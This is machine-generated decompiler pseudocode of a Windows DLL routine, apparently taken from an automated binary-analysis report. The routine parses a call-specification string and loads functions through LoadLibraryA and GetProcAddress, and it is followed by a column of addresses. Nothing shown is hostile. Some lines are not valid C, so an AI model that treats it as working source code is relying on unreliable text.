                                                            				CHAR* _t312;
                                                            				CHAR* _t313;
                                                            				char _t319;
                                                            				CHAR* _t320;
                                                            				char _t323;
                                                            				signed int _t333;
                                                            				void* _t335;
                                                            				CHAR* _t336;
                                                            				CHAR* _t337;
                                                            				void _t338;
                                                            				CHAR* _t341;
                                                            				CHAR* _t343;
                                                            				signed int _t345;
                                                            				signed int _t346;
                                                            				void* _t347;
                                                            				void* _t348;
                                                            				void* _t349;
                                                            				signed int _t355;
                                                            				CHAR* _t360;
                                                            				void* _t361;
                                                            				signed int _t368;
                                                            				signed int _t369;
                                                            				CHAR* _t370;
                                                            				void* _t371;
                                                            				CHAR* _t377;
                                                            				signed int _t379;
                                                            				CHAR* _t380;
                                                            				void* _t382;
                                                            				void* _t383;
                                                            				CHAR* _t384;
                                                            				CHAR* _t385;
                                                            				CHAR* _t386;
                                                            				CHAR* _t387;
                                                            				struct HINSTANCE__* _t388;
                                                            				CHAR* _t390;
                                                            				void* _t391;
                                                            				void* _t392;
                                                            
                                                            				 *(_t392 + 0x1c) = 0;
                                                            				_t382 = 0;
                                                            				 *(_t392 + 0x34) = 0;
                                                            				 *(_t392 + 0x30) = 0;
                                                            				 *(_t392 + 0x18) = 0;
                                                            				 *(_t392 + 0x2c) = 0;
                                                            				 *(_t392 + 0x3c) = 0;
                                                            				 *(_t392 + 0x28) = 0;
                                                            				_t236 = E73BC12C6();
                                                            				 *(_t392 + 0x14) = _t236;
                                                            				_t312 = _t236;
                                                            				 *(_t392 + 0x38) = E73BC12C6();
                                                            				_t238 = E73BC152B();
                                                            				_t391 = _t238;
                                                            				 *(_t392 + 0x44) = _t238;
                                                            				_t383 = _t238;
                                                            				 *(_t392 + 0x24) = _t391;
                                                            				 *((intOrPtr*)(_t392 + 0x48)) = 2;
                                                            				_t239 = 0;
                                                            				while(1) {
                                                            					_t368 = _t239;
                                                            					 *(_t392 + 0x40) = _t368;
                                                            					if(_t239 != 0 && _t382 == 0) {
                                                            						break;
                                                            					}
                                                            					_t240 =  *_t391;
                                                            					 *((char*)(_t392 + 0x13)) = _t240;
                                                            					_t241 = _t240;
                                                            					_t319 = _t241;
                                                            					if(_t319 == 0) {
                                                            						_t169 = _t392 + 0x1c;
                                                            						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
                                                            						__eflags =  *_t169;
                                                            						L132:
                                                            						_t369 = _t368;
                                                            						if(_t369 == 0) {
                                                            							_t370 = 0;
                                                            							 *_t312 = 0;
                                                            							__eflags = _t382;
                                                            							if(_t382 == 0) {
                                                            								_t281 = GlobalAlloc(0x40, 0x14a4); // executed
                                                            								_t382 = _t281;
                                                            								_t370 = 0;
                                                            								__eflags = 0;
                                                            								 *(_t382 + 0x810) = 0;
                                                            								 *(_t382 + 0x814) = 0;
                                                            							}
                                                            							_t242 =  *(_t392 + 0x34);
                                                            							_t177 = _t382 + 8; // 0x8
                                                            							_t320 = _t177;
                                                            							_t178 = _t382 + 0x408; // 0x408
                                                            							_t384 = _t178;
                                                            							 *_t382 = _t242;
                                                            							 *_t320 = _t370;
                                                            							 *_t384 = _t370;
                                                            							 *(_t382 + 0x808) = _t370;
                                                            							 *(_t382 + 0x80c) = _t370;
                                                            							 *(_t382 + 4) = _t370;
                                                            							_t243 = _t242 - _t370;
                                                            							__eflags = _t243;
                                                            							if(_t243 == 0) {
                                                            								__eflags = _t312 -  *(_t392 + 0x14);
                                                            								if(_t312 ==  *(_t392 + 0x14)) {
                                                            									goto L154;
                                                            								}
                                                            								_t390 = _t370;
                                                            								GlobalFree(_t382);
                                                            								_push( *(_t392 + 0x14));
                                                            								_t382 = E73BC1326();
                                                            								__eflags = _t382;
                                                            								if(_t382 == 0) {
                                                            									goto L154;
                                                            								} else {
                                                            									goto L147;
                                                            								}
                                                            								while(1) {
                                                            									L147:
                                                            									_t272 =  *(_t382 + 0x14a0);
                                                            									__eflags = _t272;
                                                            									if(_t272 == 0) {
                                                            										break;
                                                            									}
                                                            									_t390 = _t382;
                                                            									_t382 = _t272;
                                                            								}
                                                            								__eflags = _t390;
                                                            								if(_t390 != 0) {
                                                            									_t187 =  &(_t390[0x14a0]);
                                                            									 *_t187 = _t390[0x14a0] & 0x00000000;
                                                            									__eflags =  *_t187;
                                                            								}
                                                            								_t273 =  *(_t382 + 0x810);
                                                            								__eflags = _t273 & 0x00000008;
                                                            								if((_t273 & 0x00000008) == 0) {
                                                            									_t333 = 2;
                                                            									_t274 = _t273 | _t333;
                                                            									__eflags = _t274;
                                                            									 *(_t382 + 0x810) = _t274;
                                                            								} else {
                                                            									_t382 = E73BC12D5(_t382);
                                                            									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
                                                            								}
                                                            								goto L154;
                                                            							} else {
                                                            								_t276 = _t243 - 1;
                                                            								__eflags = _t276;
                                                            								if(_t276 == 0) {
                                                            									L143:
                                                            									lstrcpyA(_t320,  *(_t392 + 0x38));
                                                            									L144:
                                                            									lstrcpyA(_t384,  *(_t392 + 0x14));
                                                            									L154:
                                                            									_t312 =  *(_t392 + 0x14);
                                                            									L155:
                                                            									_t239 =  *(_t392 + 0x1c);
                                                            									_t391 = _t391 + 1;
                                                            									 *(_t392 + 0x24) = _t391;
                                                            									_t383 = _t391;
                                                            									if(_t239 != 0xffffffff) {
                                                            										continue;
                                                            									}
                                                            									break;
                                                            								}
                                                            								_t279 = _t276 - 1;
                                                            								__eflags = _t279;
                                                            								if(_t279 == 0) {
                                                            									goto L144;
                                                            								}
                                                            								__eflags = _t279 != 1;
                                                            								if(_t279 != 1) {
                                                            									goto L154;
                                                            								}
                                                            								goto L143;
                                                            							}
                                                            						}
                                                            						_t371 = _t369 - 1;
                                                            						if(_t371 == 0) {
                                                            							_t282 =  *(_t392 + 0x30);
                                                            							if( *(_t392 + 0x2c) == _t371) {
                                                            								_t282 = _t282 - 1;
                                                            							}
                                                            							 *(_t382 + 0x814) = _t282;
                                                            						}
                                                            						goto L154;
                                                            					}
                                                            					_t335 = _t319 - 0x23;
                                                            					if(_t335 == 0) {
                                                            						_t336 =  *(_t392 + 0x1c);
                                                            						__eflags = _t383 -  *(_t392 + 0x44);
                                                            						if(_t383 <=  *(_t392 + 0x44)) {
                                                            							L29:
                                                            							__eflags =  *(_t392 + 0x28);
                                                            							if( *(_t392 + 0x28) != 0) {
                                                            								L15:
                                                            								_t337 = _t336;
                                                            								__eflags = _t337;
                                                            								if(_t337 == 0) {
                                                            									_t283 =  *((intOrPtr*)(_t392 + 0x13));
                                                            									while(1) {
                                                            										__eflags = _t283 - 0x22;
                                                            										if(_t283 != 0x22) {
                                                            											break;
                                                            										}
                                                            										_t391 = _t391 + 1;
                                                            										__eflags =  *(_t392 + 0x28);
                                                            										_t383 = _t391;
                                                            										if( *(_t392 + 0x28) == 0) {
                                                            											__eflags = 1;
                                                            											 *(_t392 + 0x28) = 1;
                                                            											L121:
                                                            											 *_t312 =  *_t391;
                                                            											_t312 =  &(_t312[1]);
                                                            											goto L155;
                                                            										}
                                                            										_t157 = _t392 + 0x28;
                                                            										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
                                                            										__eflags =  *_t157;
                                                            										_t283 =  *_t391;
                                                            									}
                                                            									__eflags = _t283 - 0x2a;
                                                            									if(_t283 == 0x2a) {
                                                            										_t287 = 2;
                                                            										 *(_t392 + 0x34) = _t287;
                                                            										L129:
                                                            										_t385 =  *(_t392 + 0x14);
                                                            										L130:
                                                            										_t312 = _t385;
                                                            										goto L155;
                                                            									}
                                                            									__eflags = _t283 - 0x2d;
                                                            									if(_t283 == 0x2d) {
                                                            										L117:
                                                            										_t338 =  *_t391;
                                                            										__eflags = _t338 - 0x2d;
                                                            										if(_t338 != 0x2d) {
                                                            											L122:
                                                            											_t162 = _t391 + 1; // 0x1
                                                            											_t288 = _t162;
                                                            											__eflags =  *_t288 - 0x3a;
                                                            											if( *_t288 != 0x3a) {
                                                            												goto L121;
                                                            											}
                                                            											__eflags = _t338 - 0x2d;
                                                            											if(_t338 == 0x2d) {
                                                            												goto L121;
                                                            											}
                                                            											__eflags = 1;
                                                            											 *(_t392 + 0x34) = 1;
                                                            											L125:
                                                            											_t385 =  *(_t392 + 0x14);
                                                            											_t391 = _t288;
                                                            											__eflags = _t312 - _t385;
                                                            											if(_t312 <= _t385) {
                                                            												 *( *(_t392 + 0x38)) = 0;
                                                            											} else {
                                                            												 *_t312 = 0;
                                                            												lstrcpyA( *(_t392 + 0x3c), _t385);
                                                            											}
                                                            											goto L130;
                                                            										}
                                                            										_t159 = _t383 + 1; // 0x1
                                                            										_t288 = _t159;
                                                            										__eflags =  *_t288 - 0x3e;
                                                            										if( *_t288 != 0x3e) {
                                                            											goto L122;
                                                            										}
                                                            										 *(_t392 + 0x34) = 3;
                                                            										goto L125;
                                                            									}
                                                            									__eflags = _t283 - 0x3a;
                                                            									if(_t283 != 0x3a) {
                                                            										goto L121;
                                                            									}
                                                            									goto L117;
                                                            								}
                                                            								_t341 = _t337 - 1;
                                                            								__eflags = _t341;
                                                            								if(_t341 == 0) {
                                                            									_t313 =  *(_t392 + 0x30);
                                                            									L49:
                                                            									_t291 = _t241 + 0xffffffde;
                                                            									__eflags = _t291 - 0x55;
                                                            									if(_t291 > 0x55) {
                                                            										goto L129;
                                                            									}
                                                            									_t76 = _t291 + 0x73bc2b1c; // 0x73bc402c
                                                            									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M73BC2A94))) {
                                                            										case 0:
                                                            											__esi =  *(__esp + 0x14);
                                                            											__ecx =  *(__esp + 0x14);
                                                            											__dl =  *((intOrPtr*)(__esp + 0x13));
                                                            											while(1) {
                                                            												__ebp = __ebp + 1;
                                                            												__al =  *__ebp;
                                                            												__eflags = __al - __dl;
                                                            												if(__al != __dl) {
                                                            													goto L87;
                                                            												}
                                                            												L86:
                                                            												__eflags =  *(__ebp + 1) - __dl;
                                                            												if( *(__ebp + 1) != __dl) {
                                                            													L91:
                                                            													 *__ecx = 0;
                                                            													__esi = E73BC12AF(__esi);
                                                            													goto L92;
                                                            												}
                                                            												L87:
                                                            												__eflags = __al;
                                                            												if(__al == 0) {
                                                            													goto L91;
                                                            												}
                                                            												__eflags = __al - __dl;
                                                            												if(__al == __dl) {
                                                            													__ebp = __ebp + 1;
                                                            													__eflags = __ebp;
                                                            												}
                                                            												__al =  *__ebp;
                                                            												 *__ecx =  *__ebp;
                                                            												__ecx = __ecx + 1;
                                                            												__ebp = __ebp + 1;
                                                            												__al =  *__ebp;
                                                            												__eflags = __al - __dl;
                                                            												if(__al != __dl) {
                                                            													goto L87;
                                                            												}
                                                            												goto L86;
                                                            											}
                                                            										case 1:
                                                            											L46:
                                                            											 *(_t392 + 0x18) = 1;
                                                            											goto L129;
                                                            										case 2:
                                                            											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
                                                            											goto L129;
                                                            										case 3:
                                                            											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
                                                            											__eax = 0;
                                                            											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
                                                            											__ebx = __ebx + 1;
                                                            											__eax = 1;
                                                            											 *(__esp + 0x30) = __ebx;
                                                            											 *((intOrPtr*)(__esp + 0x2c)) = 1;
                                                            											goto L129;
                                                            										case 4:
                                                            											__eflags =  *(__esp + 0x20);
                                                            											if( *(__esp + 0x20) != 0) {
                                                            												goto L129;
                                                            											}
                                                            											 *(__esp + 0x24) = __ebp;
                                                            											__esi = E73BC12C6();
                                                            											__eax = __esp + 0x24;
                                                            											_push(__esi);
                                                            											__eax = E73BC1B4C(__eax);
                                                            											_push(__edx);
                                                            											_push(__eax);
                                                            											__eax = E73BC144D(__ecx);
                                                            											__esp = __esp + 0xc;
                                                            											goto L80;
                                                            										case 5:
                                                            											 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
                                                            											goto L129;
                                                            										case 6:
                                                            											_push(7);
                                                            											goto L74;
                                                            										case 7:
                                                            											_push(0x19);
                                                            											goto L101;
                                                            										case 8:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L58;
                                                            										case 9:
                                                            											_push(0x15);
                                                            											goto L101;
                                                            										case 0xa:
                                                            											_push(0x16);
                                                            											goto L101;
                                                            										case 0xb:
                                                            											_push(0x18);
                                                            											goto L101;
                                                            										case 0xc:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t103 = __eax + 1; // 0x1
                                                            											__edx = _t103;
                                                            											goto L69;
                                                            										case 0xd:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L61;
                                                            										case 0xe:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L75;
                                                            										case 0xf:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t105 = __eax + 1; // 0x1
                                                            											__edx = _t105;
                                                            											goto L73;
                                                            										case 0x10:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t100 = __eax + 1; // 0x1
                                                            											__edx = _t100;
                                                            											goto L65;
                                                            										case 0x11:
                                                            											_push(3);
                                                            											goto L74;
                                                            										case 0x12:
                                                            											_push(0x17);
                                                            											L101:
                                                            											_pop(__esi);
                                                            											goto L102;
                                                            										case 0x13:
                                                            											__eax = __esp + 0x24;
                                                            											__eax = E73BC1B4C(__esp + 0x24);
                                                            											_push(0xb);
                                                            											_pop(__esi);
                                                            											_t134 = __eax + 1; // 0x1
                                                            											__ecx = _t134;
                                                            											__eflags = _t134 - __esi;
                                                            											_push(1);
                                                            											_pop(__ecx);
                                                            											__esi =  >=  ? _t134 : __esi;
                                                            											__esi = __eax + __esi;
                                                            											__eflags = __esi;
                                                            											L80:
                                                            											__ebp =  *(__esp + 0x24);
                                                            											goto L93;
                                                            										case 0x14:
                                                            											__esi = __esi | 0xffffffff;
                                                            											goto L102;
                                                            										case 0x15:
                                                            											 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 1;
                                                            											_push(3);
                                                            											goto L74;
                                                            										case 0x16:
                                                            											__eax = 0;
                                                            											goto L75;
                                                            										case 0x17:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t104 = __eax + 1; // 0x1
                                                            											__edx = _t104;
                                                            											goto L71;
                                                            										case 0x18:
                                                            											_t342 =  *(_t382 + 0x814);
                                                            											__eflags = _t342 - _t313;
                                                            											_push(1);
                                                            											_t294 =  <=  ? _t313 : _t342;
                                                            											 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0;
                                                            											 *(_t392 + 0x24) =  *(_t392 + 0x24) & 0;
                                                            											_t314 =  <=  ? _t313 : _t342;
                                                            											__eflags =  *(_t392 + 0x38) - 3;
                                                            											 *(_t392 + 0x34) =  <=  ? _t313 : _t342;
                                                            											__eflags = _t342 - (0 |  *(_t392 + 0x38) == 0x00000003);
                                                            											_pop(_t297);
                                                            											_t374 =  !=  ? _t297 :  *(_t392 + 0x30);
                                                            											 *(_t392 + 0x2c) =  !=  ? _t297 :  *(_t392 + 0x30);
                                                            											goto L129;
                                                            										case 0x19:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__eflags = 1;
                                                            											L58:
                                                            											_push(2);
                                                            											_pop(__ecx);
                                                            											 *(__esp + 0x18) = __ecx;
                                                            											goto L75;
                                                            										case 0x1a:
                                                            											L69:
                                                            											_push(5);
                                                            											goto L74;
                                                            										case 0x1b:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__eflags = 1;
                                                            											L61:
                                                            											_push(3);
                                                            											_pop(__esi);
                                                            											 *(__esp + 0x18) = __esi;
                                                            											goto L75;
                                                            										case 0x1c:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											goto L75;
                                                            										case 0x1d:
                                                            											L73:
                                                            											_push(6);
                                                            											goto L74;
                                                            										case 0x1e:
                                                            											L65:
                                                            											_push(2);
                                                            											goto L74;
                                                            										case 0x1f:
                                                            											__eax = __esp + 0x24;
                                                            											__eax = E73BC1B4C(__esp + 0x24);
                                                            											__ebp =  *(__esp + 0x28);
                                                            											_t138 = __eax + 1; // 0x1
                                                            											__esi = _t138;
                                                            											L92:
                                                            											_pop(__ecx);
                                                            											L93:
                                                            											__eflags = __esi;
                                                            											if(__esi == 0) {
                                                            												goto L129;
                                                            											}
                                                            											L102:
                                                            											__ecx =  *(__esp + 0x20);
                                                            											0 = 1;
                                                            											 *((intOrPtr*)(__esp + 0x2c)) = 1;
                                                            											__eflags = __ecx;
                                                            											if(__ecx != 0) {
                                                            												__eflags = __ecx - 1;
                                                            												if(__ecx == 1) {
                                                            													__eax = __ebx;
                                                            													__eax = __ebx << 5;
                                                            													__eflags = __eax;
                                                            													 *(__eax + __edi + 0x82c) = __esi;
                                                            												}
                                                            												L109:
                                                            												 *(__esp + 0x20) = __ecx;
                                                            												goto L129;
                                                            											}
                                                            											__ebx = __ebx << 5;
                                                            											__eax =  *(__ebx + __edi + 0x830);
                                                            											__eflags = __eax - 0xffffffff;
                                                            											if(__eax <= 0xffffffff) {
                                                            												L105:
                                                            												__eax = GlobalFree(__eax);
                                                            												__ecx =  *(__esp + 0x20);
                                                            												L106:
                                                            												 *(__ebx + __edi + 0x830) = __esi;
                                                            												goto L109;
                                                            											}
                                                            											__eflags = __eax - 0x19;
                                                            											if(__eax <= 0x19) {
                                                            												goto L106;
                                                            											}
                                                            											goto L105;
                                                            										case 0x20:
                                                            											L71:
                                                            											_push(4);
                                                            											L74:
                                                            											_pop(__eax);
                                                            											L75:
                                                            											__ecx =  *(0x73bc4090 + __eax * 4);
                                                            											__esi = __ebx;
                                                            											__esi = __ebx << 5;
                                                            											__edx =  ~__edx;
                                                            											_push(1);
                                                            											asm("sbb edx, edx");
                                                            											 *(__esp + 0x30) = 1;
                                                            											__edx = __edx & 0x00008000;
                                                            											__edx = __edx | __eax;
                                                            											0 = 1;
                                                            											 *(__esi + __edi + 0x818) = __edx;
                                                            											__edx =  *(__esp + 0x1c);
                                                            											__eflags = __ecx;
                                                            											__eax =  >  ? __ecx : 1;
                                                            											__eflags = __edx;
                                                            											_pop(__ecx);
                                                            											__eax =  <  ? __ecx :  >  ? __ecx : 1;
                                                            											 *((intOrPtr*)(__esi + __edi + 0x828)) =  <  ? __ecx :  >  ? __ecx : 1;
                                                            											__eflags = __edx - __ecx;
                                                            											if(__edx == __ecx) {
                                                            												__eax = __esp + 0x24;
                                                            												__eax = E73BC1B4C(__esp + 0x24);
                                                            												__ebp =  *(__esp + 0x28);
                                                            												_t116 = __eax + 1; // 0x1
                                                            												__edx = _t116;
                                                            												 *(__esp + 0x18) = __edx;
                                                            											}
                                                            											 *(__esi + __edi + 0x830) =  *(__esi + __edi + 0x830) & 0x00000000;
                                                            											__ecx = __ebx + 0x41;
                                                            											__ecx = __ebx + 0x41 << 5;
                                                            											 *(__esi + __edi + 0x81c) = __edx;
                                                            											 *((__ebx + 0x41 << 5) + __edi) =  *((__ebx + 0x41 << 5) + __edi) & 0x00000000;
                                                            											 *(__esi + __edi + 0x82c) =  *(__esi + __edi + 0x82c) & 0x00000000;
                                                            											goto L129;
                                                            										case 0x21:
                                                            											goto L129;
                                                            									}
                                                            								}
                                                            								_t343 = _t341 - 1;
                                                            								__eflags = _t343;
                                                            								if(_t343 == 0) {
                                                            									_t313 = 0;
                                                            									 *(_t392 + 0x30) = 0;
                                                            									goto L49;
                                                            								}
                                                            								__eflags = _t343 != 1;
                                                            								if(_t343 != 1) {
                                                            									goto L121;
                                                            								}
                                                            								__eflags = _t241 - 0x6e;
                                                            								if(__eflags > 0) {
                                                            									_t298 = _t241 - 0x72;
                                                            									__eflags = _t298;
                                                            									if(_t298 == 0) {
                                                            										_push(4);
                                                            										L41:
                                                            										_pop(_t299);
                                                            										L42:
                                                            										_t345 =  *(_t382 + 0x810);
                                                            										__eflags =  *(_t392 + 0x18) - 1;
                                                            										if( *(_t392 + 0x18) != 1) {
                                                            											_t346 = _t345 &  !_t299;
                                                            											__eflags = _t346;
                                                            										} else {
                                                            											_t346 = _t345 | _t299;
                                                            										}
                                                            										 *(_t382 + 0x810) = _t346;
                                                            										goto L46;
                                                            									}
                                                            									_t303 = _t298 - 1;
                                                            									__eflags = _t303;
                                                            									if(_t303 == 0) {
                                                            										_push(0x10);
                                                            										goto L41;
                                                            									}
                                                            									_t347 = 2;
                                                            									__eflags = _t303 != _t347;
                                                            									if(_t303 != _t347) {
                                                            										goto L129;
                                                            									}
                                                            									_push(0x40);
                                                            									goto L41;
                                                            								}
                                                            								if(__eflags == 0) {
                                                            									_push(8);
                                                            									goto L41;
                                                            								}
                                                            								_t305 = _t241 - 0x21;
                                                            								__eflags = _t305;
                                                            								if(_t305 == 0) {
                                                            									 *(_t392 + 0x18) =  ~( *(_t392 + 0x18));
                                                            									goto L129;
                                                            								}
                                                            								_t306 = _t305 - 0x11;
                                                            								__eflags = _t306;
                                                            								if(_t306 == 0) {
                                                            									_t299 = 0x100;
                                                            									goto L42;
                                                            								}
                                                            								_t307 = _t306 - 0x31;
                                                            								__eflags = _t307;
                                                            								if(_t307 == 0) {
                                                            									_t299 = 1;
                                                            									goto L42;
                                                            								}
                                                            								_t348 = 2;
                                                            								__eflags = _t307 != _t348;
                                                            								if(_t307 != _t348) {
                                                            									goto L129;
                                                            								} else {
                                                            									_push(0x20);
                                                            									goto L41;
                                                            								}
                                                            							}
                                                            							 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0x00000000;
                                                            							 *(_t392 + 0x34) =  *(_t392 + 0x34) & 0x00000000;
                                                            							goto L132;
                                                            						}
                                                            						__eflags =  *((char*)(_t391 - 1)) - 0x3a;
                                                            						if( *((char*)(_t391 - 1)) != 0x3a) {
                                                            							goto L29;
                                                            						}
                                                            						__eflags = _t336;
                                                            						if(_t336 == 0) {
                                                            							goto L15;
                                                            						}
                                                            						goto L29;
                                                            					}
                                                            					_t349 = _t335 - 5;
                                                            					if(_t349 == 0) {
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						if( *(_t392 + 0x28) == 0) {
                                                            							 *(_t392 + 0x1c) = 1;
                                                            							__eflags =  *(_t392 + 0x34) - 3;
                                                            							_t360 = (0 |  *(_t392 + 0x34) == 0x00000003) + 1;
                                                            							__eflags = _t360;
                                                            							 *(_t392 + 0x30) = _t360;
                                                            						}
                                                            						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
                                                            						_t377 =  *(_t392 + 0x28);
                                                            						__eflags = _t377;
                                                            						_t351 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x2c) =  *(_t392 + 0x2c) & 0x00000000;
                                                            						__eflags = _t377;
                                                            						_t353 =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
                                                            						 *(_t392 + 0x2c) =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
                                                            						__eflags = _t377;
                                                            						_t355 = 0 | _t377 == 0x00000000;
                                                            						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
                                                            						L13:
                                                            						 *(_t392 + 0x20) = _t379;
                                                            						_t368 =  *(_t392 + 0x40);
                                                            						__eflags = _t355;
                                                            						if(_t355 != 0) {
                                                            							goto L132;
                                                            						}
                                                            						L14:
                                                            						_t336 =  *(_t392 + 0x1c);
                                                            						goto L15;
                                                            					}
                                                            					_t361 = _t349 - 1;
                                                            					if(_t361 == 0) {
                                                            						_t380 =  *(_t392 + 0x28);
                                                            						__eflags = _t380;
                                                            						_t363 =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
                                                            						 *(_t392 + 0x1c) =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
                                                            						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
                                                            						__eflags = _t380;
                                                            						_t365 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						__eflags = _t380;
                                                            						_t355 = 0 | _t380 == 0x00000000;
                                                            						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
                                                            						goto L13;
                                                            					}
                                                            					if(_t361 != 0x16) {
                                                            						goto L14;
                                                            					} else {
                                                            						 *(_t392 + 0x1c) = 3;
                                                            						 *(_t392 + 0x18) = 1;
                                                            						goto L132;
                                                            					}
                                                            				}
                                                            				GlobalFree( *(_t392 + 0x44));
                                                            				GlobalFree( *(_t392 + 0x14));
                                                            				GlobalFree( *(_t392 + 0x38));
                                                            				if(_t382 == 0 ||  *(_t382 + 0x80c) != 0) {
                                                            					L181:
                                                            					return _t382;
                                                            				} else {
                                                            					_t249 =  *_t382 - 1;
                                                            					if(_t249 == 0) {
                                                            						_t215 = _t382 + 8; // 0x8
                                                            						_t386 = _t215;
                                                            						__eflags =  *_t386;
                                                            						if( *_t386 != 0) {
                                                            							_t250 = GetModuleHandleA(_t386);
                                                            							 *(_t382 + 0x808) = _t250;
                                                            							__eflags = _t250;
                                                            							if(_t250 != 0) {
                                                            								L169:
                                                            								_t220 = _t382 + 0x408; // 0x408
                                                            								_t387 = _t220;
                                                            								_t251 = E73BC1ECE(_t250, _t387);
                                                            								 *(_t382 + 0x80c) = _t251;
                                                            								__eflags = _t251;
                                                            								if(_t251 == 0) {
                                                            									__eflags =  *_t387 - 0x23;
                                                            									if( *_t387 == 0x23) {
                                                            										_t222 = _t382 + 0x409; // 0x409
                                                            										_t255 = E73BC1326();
                                                            										__eflags = _t255;
                                                            										if(_t255 != 0) {
                                                            											__eflags = _t255 & 0xffff0000;
                                                            											if((_t255 & 0xffff0000) == 0) {
                                                            												 *(_t382 + 0x80c) = GetProcAddress( *(_t382 + 0x808), _t255 & 0x0000ffff);
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								__eflags =  *(_t392 + 0x3c);
                                                            								if( *(_t392 + 0x3c) != 0) {
                                                            									L176:
                                                            									_t252 = lstrlenA(_t387);
                                                            									_t323 = 0x41;
                                                            									_t387[_t252] = _t323;
                                                            									_t253 = E73BC1ECE( *(_t382 + 0x808), _t387);
                                                            									__eflags = _t253;
                                                            									if(_t253 == 0) {
                                                            										__eflags =  *(_t382 + 0x80c);
                                                            										L179:
                                                            										if(__eflags != 0) {
                                                            											goto L181;
                                                            										}
                                                            										L180:
                                                            										_t233 = _t382 + 4;
                                                            										 *_t233 =  *(_t382 + 4) | 0xffffffff;
                                                            										__eflags =  *_t233;
                                                            										goto L181;
                                                            									}
                                                            									L177:
                                                            									 *(_t382 + 0x80c) = _t253;
                                                            									goto L181;
                                                            								} else {
                                                            									__eflags =  *(_t382 + 0x80c);
                                                            									if( *(_t382 + 0x80c) != 0) {
                                                            										goto L181;
                                                            									}
                                                            									goto L176;
                                                            								}
                                                            							}
                                                            							_t250 = LoadLibraryA(_t386);
                                                            							 *(_t382 + 0x808) = _t250;
                                                            							__eflags = _t250;
                                                            							if(_t250 == 0) {
                                                            								goto L180;
                                                            							}
                                                            							goto L169;
                                                            						}
                                                            						_t216 = _t382 + 0x408; // 0x408
                                                            						_t259 = E73BC1326();
                                                            						 *(_t382 + 0x80c) = _t259;
                                                            						__eflags = _t259;
                                                            						goto L179;
                                                            					}
                                                            					_t260 = _t249 - 1;
                                                            					if(_t260 == 0) {
                                                            						_t214 = _t382 + 0x408; // 0x408
                                                            						_t261 = _t214;
                                                            						__eflags =  *_t261;
                                                            						if( *_t261 == 0) {
                                                            							goto L181;
                                                            						}
                                                            						_push(_t261);
                                                            						_t253 = E73BC1326();
                                                            						goto L177;
                                                            					}
                                                            					if(_t260 != 1) {
                                                            						goto L181;
                                                            					}
                                                            					_t202 = _t382 + 8; // 0x8
                                                            					_t317 = _t202;
                                                            					_push(_t202);
                                                            					_t388 = E73BC1326();
                                                            					 *(_t382 + 0x808) = _t388;
                                                            					if(_t388 == 0) {
                                                            						goto L180;
                                                            					}
                                                            					 *(_t382 + 0x84c) =  *(_t382 + 0x84c) & 0x00000000;
                                                            					_t264 = E73BC12AF(_t317);
                                                            					 *(_t382 + 0x83c) =  *(_t382 + 0x83c) & 0x00000000;
                                                            					 *((intOrPtr*)(_t382 + 0x850)) = _t264;
                                                            					 *((intOrPtr*)(_t382 + 0x848)) = 1;
                                                            					 *((intOrPtr*)(_t382 + 0x838)) = 1;
                                                            					_t211 = _t382 + 0x408; // 0x408
                                                            					_t253 =  *(_t388->i + E73BC1326() * 4);
                                                            					goto L177;
                                                            				}
                                                            			}
                                                            0x73bc26b4
                                                            0x73bc26c7
                                                            0x73bc26c8
                                                            0x73bc26d0
                                                            0x00000000
                                                            0x73bc26d0
                                                            0x73bc26b6
                                                            0x73bc26b6
                                                            0x73bc26b8
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26ba
                                                            0x73bc26bc
                                                            0x73bc26be
                                                            0x73bc26be
                                                            0x73bc26be
                                                            0x73bc26bf
                                                            0x73bc26c2
                                                            0x73bc26c4
                                                            0x73bc26a9
                                                            0x73bc26aa
                                                            0x73bc26ad
                                                            0x73bc26af
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26af
                                                            0x00000000
                                                            0x73bc24b8
                                                            0x73bc24bb
                                                            0x00000000
